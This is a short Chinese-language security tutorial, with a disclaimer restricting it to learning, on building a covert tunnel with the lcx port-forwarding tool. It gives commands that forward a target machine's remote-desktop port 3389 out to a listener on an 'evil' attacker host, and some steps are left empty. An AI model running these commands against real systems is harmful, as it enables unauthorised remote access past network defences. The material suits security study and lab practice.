隐藏隧道通信：lcx 端口转发

郑重声明：
本笔记编写目的只用于安全知识提升，并与更多人共享安全知识，切勿使用笔记中的技术进行违法活动，利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责，共同维护网络文明和谐。

• 1 lcx 端口转发原理
• 2 实验环境
• 3 配置服务端
• 4 配置客户端

lcx 是基于 Socket 套接字实现的端口转发工具，Windows 版本名称为 LCX、Linux 版本为 portmap。

一个基本的 Socket 隧道必须包含两端：

1. 服务端：监听一个端口，等待客户端连接
2. 客户端：通过传入服务端的 IP 地址和端口，与服务端建立连接。

lcx.exe -h
[Usage of Packet Transmit:]
 lcx.exe -  [-log logfile]

[option:]
 -listen  
 -tran      # 经测试无法过 nat 有点鸡肋。
 -slave    

• 在 evil 主机上，将本机 4444 端口上监听的所有数据转发到本地的 13389 端口上

lcx.exe -listen 4444 13389

• 首先准备好一个具有公网 ip 的服务器，假定域名或者公网 ip 是 192.168.0.21
• 在目标机器上将 3389 端口的所有数据转发到恶意主机的 4444 端口上。

1. 配置 LCX 端口转发

   .lcx.exe -slave 192.168.0.110 4444 127.0.0.1 3389
   

2. 客户端与服务端建立通信连接

3. 与远程主机建立远程桌面连接

   • 客户端：

   • 服务端：

4. 抓包查看流量特征